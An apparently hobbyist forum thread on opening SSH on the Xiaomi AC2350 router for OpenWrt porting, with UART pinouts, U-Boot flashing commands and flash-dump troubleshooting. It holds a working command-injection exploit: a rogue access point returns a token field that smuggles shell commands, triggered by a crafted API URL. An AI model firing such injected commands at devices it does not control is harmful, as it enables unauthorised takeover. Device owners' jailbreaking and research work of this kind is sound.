Support AIoT AC2350 Xiaomi?

Attaching multiple router logs, hopefully it will help someone.
AC2350 Logs.

Firmware version: 3.0.36.
OpenWRT Invasion script does not work with this router. I guess we need to downgrade firmware somehow.

3 Likes

I got access via SSH on 3.0.36. The method is not simple, but it is quite reproducible. A second access point is required (preferably on OpenWRT, but not necessarily). See https://github.com/acecilia/OpenWRTInvasion/issues/46#issuecomment-753657973
Now I'm interested in how this can help with porting :slight_smile:

2 Likes

dmesg output

2 Likes

UART boot log
U-Boot help message

Upd.: Now I can flash any firmware to check and return the factory state. I hope there is an interested developer here who can start porting using my router for tests.

2 Likes

I waiting for your answer, and describe my problem.

I have Connect Box from UPC at my first router and Xiaomi AC2350 as my wireless repeater. I have non stop problem to lose connection from Xiaomi to Connet Box.

+1. Available settings on this router are so basic.

1 Like

Hello Mr Dobos. :slight_smile: Also i have a CB. Try the Xiaomi as router and use the CB in modem mode.

Important notes:

  1. If you do not follow the instructions described here correctly, you can damage your device!
  2. Capture everything you do in the UART console (for example, in minicom, this is enabled by pressing Ctrl+Z, L). The resulting text files will help me figure out what went wrong and how to restore the device.
  3. If something went wrong, then stop and describe what happened here on the forum, so as not to worsen the situation, but to sort it out together.

Currently, I have found 2 ways to open ssh access.

1 ) Via UART on the board.
This method is easier for those who know how to use a soldering iron. You will need a USB to TTL adapter.

UART pinouts:

4  3  2  1
-  -  -  -
t  g  r  v
x  n  x  c
   d     c

I connected to UART without opening the case through the vents.

Connecting the adapter:
RX <---> TX
TX <---> RX
GND <-> GND
Attention! Do not connect the VCC!

I use minicom on Linux and macOS. On Windows you can use Putty. The connection speed is 115200. If you have connected everything correctly, then a log will be displayed in the terminal program on the computer after restarting the router.

Now we need to make the router think that we are in emergency mode and let us go to the u-boot console. Connect the power to the router and turn it off after 5-10 seconds. After the next power connection, the startup will be stopped for 2 seconds. At this time, you should see the inscription Hit any key to stop autoboot: and a countdown (2..1..0). At this time, you need to press any key and you will be taken to the u-boot console. If everything is done correctly, you will see the prompt: ath>.

Next, we will need a TFTP server on the computer. To do this on Linux, you can use dnsmasq for example. Copy the following files to the root folder of the TFTP server:

In the u-boot console, run:
tftpboot 0x80060000 rootfs.squashfs.mod
Waiting for a message about a successful download (! size must be equal to cbdd5c !).
Erasing the old rootfs in flash:
erase 0x9f310000 +0xcbdd5c
Flashing a new rootfs:
cp.b 0x80060000 0x9f310000 0xcbdd5c
After copying is complete, restart the router:
reset

To roll back to the original rootfs, do the same, but replace the file name with 310000.squashfs:
tftpboot 0x80060000 310000.squashfs
erase 0x9f310000 +0xcbdd5c
cp.b 0x80060000 0x9f310000 0xcbdd5c
reset

When you first start the ssh server on the router, an RSA key is generated, so the launch will take longer. After about 2 minutes, SSH access should be opened.

2 ) Using a vulnerability exploited through the web interface
This method does not require soldering skills, but requires an additional access point on a controlled firmware (OpenWRT or similar).
Based on Adding OpenWrt support for Xiaomi AX3600

You will need an WiFi AP where you can respond to HTTP POST requests. Almost any access point or wireless router on an alternative firmware will work.
On a POST request to /cgi-bin/luci/api/xqsystem/token it should answer:
{"code":0,"token":"; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;"}

Also, this access point must have the DHCP server disabled, the wired network disconnected, and the IP address set to 169.254.31.1.

Now we need to log in to the web interface on the hacked router. After that, you need to copy the token to the url (after stok= and before the next slash). Next, insert the following url in the address bar:
http://<router IP>/cgi-bin/luci/;stok=<STOK>/api/xqsystem/extendwifi_connect_inited_router?ssid=ssidname&password=PaSsW0rd&encryption=WPA2PSK&enctype=AES&channel=11&band=2g&admin_username=user&admin_password=pwd&admin_nonce=xxx
<STOK> - token copied from the previous url
ssid, password, encryption, enctype, channel, band - connection parameters to the second WiFi access point
admin_username, admin_password, admin_nonce - ignored, can contain any values

After successful loading of this url, SSH access will be opened. However, without flashing modified rootfs, you will have to go through the described procedure again after each reboot of the router.

You can flash rootfs in the system console of the router with the following commands:
tftp -g -r rootfs.squashfs.mod -l /tmp/rootfs.squashfs.mod <IP address of TFTP server>
Waiting for a successful download.
mtd write /tmp/rootfs.squashfs.mod rootfs
After successful firmware, restart the router:
reboot

PS Changes to the modified rootfs:

  • the firmware distribution channel is ignored when the SSH server is started
  • removed overwrite of nvram parameters from bdata
  • the overlay in tmpfs has been replaced with an overlay in the mtd section rootfs_data

UPD Sorry, I forgot to attach the rootfs change diff yesterday. https://gist.github.com/eisaev/bfcabf299a18c9302236afe7c4f69667

3 Likes

Thank you for explaint what to do, but I don't have that access point to do that.

Csszokolai thank you for help, but I need to have Connect Box on other room that i have Xiaomi AC250, so for me is impossible.

For me the only solution is to anybody compile new rom with SSH support.

1 Like

Thank you for explaint what to do, but I don't have that access point to do that.

Only the second method requires an additional access point. But the first method requires only an USB2TTL adapter and a steady hand :slight_smile:

For me the only solution is to anybody compile new rom with SSH support.

Unfortunately, this is not possible until the private key for signing firmware has leaked. The RSA signature is checked both when flashing via the web interface and using recovery mode via TFTP.

I have a USB2TTL adaper and have already used it on the Zyxel NSA310, but no soldering because unfortunately I have no soldering iron or talent to work with it.
It looks like I will have to replace this router with another - what would you recommend me?

I thought something like this would be a better solution:

For hardware recommendations please open a new topic in the Hardware Questions and Recommendations category of this forum.

Please see https://openwrt.org/faq/which_router_should_i_buy before asking for recommendations. This way you will get better recommendations and come to a quicker solution.

Thank you for all your help - for now I test connection with my wifi without any special characters, beacaus that may be my solution for problem with lost connection.

I just got mine yesterday and didnt givet very long until I wanted to get ssh going.
I opened it up and put a ch341a clamp on the flash and dumped it all with asprogrammer.
I then edited the few values to enable telnet ssh and uart using this guide

Then happy a bit too soon feeling safe I dumped the flash earlier I went to flashing the edited bin also using asprogrammer.
Sadly it didnt boot and leds glow blue.
Not sure where I went wrong. I had the power disconnected from the router while flashing and let it sit for a minute after before trying to boot.

I obviously tried flashing back the unmodified dump I made and it still does not boot. I can't figure it out.
I tried using a xubuntu liveusb and flashboot aswell and it reports to flash fine but wont boot still.

Any pointers would be appreciated. I could also upload the flash if needed.

When you edit parameters in Bdata or in nvram, you need to recalculate the checksum! Otherwise, the parameters from these partitions will not be read by the firmware.
Can you connect to UART via USB2TTL adapter? I think the boot log from UART console could have given more information.

1 Like

Aye rookie misstake by me i guess. I belive the ch341a can do that indeed I don't have the nice cables to do it sadly.
Dum question im sure but can I recalculate it running the edited bin thru a program?
And how come it does not recover when flashing the unedited bin? Shouldnt that match?

To clarify I edited the dumped .bin using hxd following the first steps from here. https://aisoa.cn/post-3120.html

Aye rookie misstake by me i guess. I belive the ch341a can do that indeed I don't have the nice cables to do it sadly.

I got the CH341A connection to the UART only after applying 3.3V mod (https://www.chucknemeth.com/usb-devices/ch341a/3v-ch341a-mod).

Dum question im sure but can I recalculate it running the edited bin thru a program?

To edit the dumps of nvram and Bdata partitions, I used a script for AX3600 (https://github.com/odedlaz/ax3600-files/blob/master/scripts/header.py)

And how come it does not recover when flashing the unedited bin? Shouldnt that match?

I think that first of all you need to understand why it is not restored on an unmodified dump. The dump may have been made incorrectly. If you post a dump somewhere, I can see how much it looks like a real dump.

Perhaps after flashing the original dump, you just need to reset the settings. To do this, connect the power to the router for 5-10 seconds and turn it off. The next time you connect the power, the router should try to reset the settings to factory settings.

Perhaps it still booted up, but without WiFi. Try connecting to it by wire (the default IP address is 192.168.31.1).

1 Like

To clarify I edited the dumped .bin using hxd following the first steps from here. https://aisoa.cn/post-3120.html

I've seen this manual. It not only ignores checksum nvram and Bdata, but also does not take into account that on our model, the dropbear startup script checks the contents of /usr/share/xiaoqiang/xiaoqiang_version file in the firmware:

start_service()
{
	# 稳定版不能打开ssh服务
	flg_ssh=`nvram get ssh_en`
	channel=`/sbin/uci get /usr/share/xiaoqiang/xiaoqiang_version.version.CHANNEL`
	if [ "$flg_ssh" != "1" -o "$channel" = "release" ]; then
		return 0
	fi
	
	[ -s /etc/config/dropbear_key/dropbear_rsa_host_key ] || keygen

	. /lib/functions.sh
	. /lib/functions/network.sh

	config_load "${NAME}"
	config_foreach dropbear_instance dropbear
}
1 Like